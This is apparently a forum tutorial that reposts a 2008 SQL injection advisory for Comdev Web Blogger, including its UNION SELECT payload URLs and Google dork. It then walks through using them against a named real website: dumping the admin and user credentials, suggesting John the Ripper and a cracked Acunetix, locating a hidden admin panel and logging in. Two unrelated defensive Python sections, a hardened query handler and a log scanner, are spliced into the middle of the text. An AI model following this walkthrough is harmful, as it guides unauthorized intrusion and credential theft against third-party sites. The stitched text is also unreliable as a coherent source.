
Today we are going to learn the Web Applications part of milw0rm.com.

So let's go to milw0rm, shall we?

Now go to Web Applications, and you see a whole lot of stuff, right? We're going to look for an SQL injection vulnerability.

I found this one right here, and it shows you the following:

Code:
 

   ____________________ ___ ___ ________
   \_   _____/\_   ___ \/   |   \\_____  \
    |    __)_ /    \  \/    ~    \/   |   \
    |        \\     \___\    Y    /    |    \
   /_______  / \______  /\___|_  /\_______  /
           \/         \/       \/         \/

.OR.ID
ECHO_ADV_100$2008

-----------------------------------------------------------------------------------------
[ECHO_ADV_100$2008] Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability
-----------------------------------------------------------------------------------------
Author : M.Hasran Addahroni
Date : July 14th, 2008
Location : Jakarta, Indonesia
Web : http://e-rdc.org/v1/news.php?readmore=102
Critical Lvl : Medium
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Comdev Web Blogger
Version : <= 4.1.3
Vendor : http://www.comdevweb.com/blogger.php
Description :

Comdev Web Blogger is your voice and also allows others to give you feedback on a post-by-post basis.
Site members can now create, manage, upload photos to their own blogs. FEATURES: Non Template-Based Gives You Flexibility to Fit
the Web Blogger to Your Web Design Page • Multiple user accounts to create & invite friends to their own blogs • Hot Blogs,
Latest Blogs • RSS News Feeds • Blogs Categorisation • Hot Blogs & Latest Blogs • Search Blogs • Mini Calendar • Monthly Archive •
Links to Friends' Blog • Public or Friends View Only Blogs • Set Post Comments Permission • Friends Login • Forms Submission with
CAPTCHA Image Verification • WYSIWYG Editor for Blog & Comment • Notify Friends of New Blog • Set View & Post Comment Permissions •
Set Date & Time Format • Local Time Zone • Pre-defined Front-end CSS • Personalized Emails & Auto-Responders •
Installation Support available

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

Input passed to the "arcmonth" parameter in the blog's page is not properly verified before being used
in an SQL query.
This can be exploited through the browser to manipulate SQL queries and pull the username and password
of the admin and users in plain text. Successful exploitation requires that "magic_quotes" is off.


Poc/Exploit:
~~~~~~~~~

http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*

Admin Login at http://www.example.com/[PATH]/oneadmin/

Dork:
~~~~
Google : "Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"


Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini


Timeline:
~~~~~~~~

- 11 - 07 - 2008 bug found
- 11 - 07 - 2008 vendor contacted
- 14 - 07 - 2008 advisory released
---------------------------------------------------------------------------

Shoutz:
~~~~
~ ping - my dearest wife "happy birthday darling", zautha - my beloved son
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
kuntua, stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ----------------------------------

# milw0rm.com [2008-07-15]
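Before going on, here is what the advisory's Vulnerability and Solution sections mean in code. This is an added example, not code from the original post, the advisory or Comdev Web Blogger: a constructed in-memory sqlite stand-in, with the `sys_user`, `username` and `password` names taken from the PoC and an assumed `posts` table, showing the unsafe string-spliced query next to a hardened handler that whitelists the two archive parameters as in-range integers and binds them. It also runs an addslashes() emulation over the PoC value to show why the advisory's second fix is weak: the payload contains no quote characters, so magic_quotes_gpc (removed in PHP 5.4 anyway) leaves it untouched.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the blog's database. The table/column
# names sys_user, username and password come from the advisory's PoC; the
# posts table and its columns are assumptions made for this example.
SCHEMA = """
CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT,
                    year INTEGER, month INTEGER);
CREATE TABLE sys_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO posts VALUES (1, 'hello', 'first post', 2007, 10);
INSERT INTO sys_user VALUES (1, 'admin', 'constructed-secret');
"""

# The advisory's second PoC value for arcmonth, URL-decoded, with a '--'
# terminator (sqlite lacks the MySQL concat()/0x3a form used by the first one).
INJECTED_MONTH = "-1 union select 1,username,3,password,5,6 from sys_user--"


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def unsafe_query(arcyear, arcmonth):
    """The vulnerable pattern: request values spliced straight into the SQL text."""
    return ("SELECT id, title, body, year, month, 0 FROM posts "
            f"WHERE year = {arcyear} AND month = {arcmonth}")


def unsafe_archive(con, arcyear, arcmonth):
    return con.execute(unsafe_query(arcyear, arcmonth)).fetchall()


def addslashes(s):
    """Emulates PHP's addslashes(): all that magic_quotes_gpc did to input."""
    return re.sub(r"([\\'\"\x00])", r"\\\1", s)


class BadRequest(ValueError):
    """A request parameter failed validation; the caller should answer HTTP 400."""


DIGITS_RE = re.compile(r"[0-9]{1,4}")


def parse_archive_params(arcyear, arcmonth):
    """Whitelist validation: both values must be plain ASCII integers in range."""
    if not (DIGITS_RE.fullmatch(arcyear) and DIGITS_RE.fullmatch(arcmonth)):
        raise BadRequest("arcyear and arcmonth must be plain integers")
    year, month = int(arcyear), int(arcmonth)
    if not (1990 <= year <= 2100 and 1 <= month <= 12):
        raise BadRequest("arcyear/arcmonth out of range")
    return year, month


def safe_archive(con, arcyear, arcmonth):
    """Hardened handler: validated integers bound as parameters, never string-joined."""
    year, month = parse_archive_params(arcyear, arcmonth)
    return con.execute(
        "SELECT id, title, body, year, month, 0 FROM posts "
        "WHERE year = ? AND month = ?", (year, month)).fetchall()


def is_rejected(con, arcyear, arcmonth):
    """True if the hardened handler refuses the request instead of querying."""
    try:
        safe_archive(con, arcyear, arcmonth)
    except BadRequest:
        return True
    return False


if __name__ == "__main__":
    db = connect()
    print("normal request:", unsafe_archive(db, "2007", "10"))
    print("injected, unsafe handler:", unsafe_archive(db, "2007", INJECTED_MONTH))
    print("payload after addslashes():", addslashes(INJECTED_MONTH))
    print("injected, hardened handler rejected:", is_rejected(db, "2007", INJECTED_MONTH))
```

The point of the comparison is that validation and binding are two separate layers: binding alone would already stop the UNION, and the integer whitelist additionally turns the malformed request into a clean 400 instead of a database error, which is what you want to see in the logs.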
Now look at:
Code:
http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*

This is the SQL injection for the site.

There are two separate ones, and under that is the dork:

Code:

"Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"

The dork is what you type into Google or whatever search engine you want,

and the search engine will give you a list of websites that are powered by that software.

So go into your search engine and paste that,

or type

Code:
allinurl:".php?domain= arcyear=2007 arcmonth"

So you see a whole bunch of websites, right, and you're looking for the dork.

So the website we are going to use is listed below.

Code:
http://uhrionline.org/blog.php?domai...07&arcmonth=10
So you've got the sites that Google provided; look for any site that has the dork and click it.

Now, once you are at that site, take the SQL injection code and paste it into the URL so it looks like this, then hit enter.

You see the admin username and password, along with the other users as well. That password is encrypted, so use John the Ripper or Cain and Abel to decrypt it. In this case it is unencrypted and there is NO PW (WTF LOL).
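On the defending side, the request in the step above leaves a distinctive trace in the web server's access log. The following is an added example, not from the original post or the advisory: a small scanner over constructed Apache combined-format log lines (documentation IP ranges, invented paths; only the arcmonth payload shape follows the advisory's PoC) that flags a UNION ... SELECT, SQL comment terminators, and any arcyear/arcmonth value that is not an in-range integer.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-format access-log lines for this example. The
# addresses are documentation ranges and the paths are invented; only the
# arcmonth payload shape is taken from the advisory's PoC.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Jul/2008:10:01:02 +0000] "GET /blog.php?domain=&arcyear=2007&arcmonth=10 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Jul/2008:10:01:09 +0000] "GET /blog.php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,username,3,password,5,6%20from%20sys_user-- HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Jul/2008:10:02:30 +0000] "GET /blog.php?domain=&arcyear=2007&arcmonth=-11%20UNION%20SELECT%201,2,3,4,5,6%20FROM%20sys_user/* HTTP/1.1" 200 5301 "-" "curl/7.18"
198.51.100.7 - - [14/Jul/2008:10:03:00 +0000] "GET /oneadmin/ HTTP/1.1" 404 221 "-" "curl/7.18"
"""

# Combined log format: ip ident user [timestamp] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
UNION_RE = re.compile(r"\bunion\b.{0,40}?\bselect\b", re.IGNORECASE | re.DOTALL)
# Parameters the archive page treats as integers, with the range each may take
# (the ranges are assumptions for this example).
NUMERIC_PARAMS = {"arcyear": (1990, 2100), "arcmonth": (1, 12)}


def inspect_target(target):
    """Return the reasons a request target looks like SQL injection on the archive params."""
    reasons = []
    query = urlsplit(target).query
    decoded = unquote_plus(query)
    if UNION_RE.search(decoded):
        reasons.append("UNION ... SELECT in query string")
    if "--" in decoded or "/*" in decoded:
        reasons.append("SQL comment terminator in query string")
    params = parse_qs(query, keep_blank_values=True)  # parse_qs percent-decodes values
    for name, (lo, hi) in NUMERIC_PARAMS.items():
        for value in params.get(name, []):
            if not re.fullmatch(r"[0-9]{1,4}", value) or not lo <= int(value) <= hi:
                reasons.append(f"{name} is not an integer in [{lo}, {hi}]: {value[:24]!r}")
    return reasons


def scan_log(text):
    """Return (line number, client IP, status, reasons) for every suspicious request."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        reasons = inspect_target(m.group("target"))
        if reasons:
            hits.append((lineno, m.group("ip"), int(m.group("status")), reasons))
    return hits


if __name__ == "__main__":
    for lineno, ip, status, reasons in scan_log(SAMPLE_LOG):
        print(f"line {lineno} from {ip} (HTTP {status}): " + "; ".join(reasons))
```

The status code is reported alongside the reasons because it is the quickest triage signal: in the constructed lines the injected requests came back 200 with a larger body than the normal archive page, which is exactly what input validation on the server should turn into a 400.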

Then you will have to find the admin login page. I would: 1. go through every link, right-click, view source, and look for an admin login page; if it's not there, get the cracked version of Acunetix and scan that website, and it will show you the admin page.

Then you can just log in and do whatever you want.

Now what I did was SQL inject the site, and it gave me the following:

admin::

Anyway, milw0rm said to look for /oneadmin.

Well, oneadmin does not exist..

So then we went through every link, looking at the source code for a login page, and didn't find one. My last step was to scan the site with all of its links.

After scanning I came up with
Code:
http://www.uhrionline.org/oadmin/index.php?
Oh, they think they are sneaky bastards.


So now we log in :P

with the username admin and a blank password,
and get this:
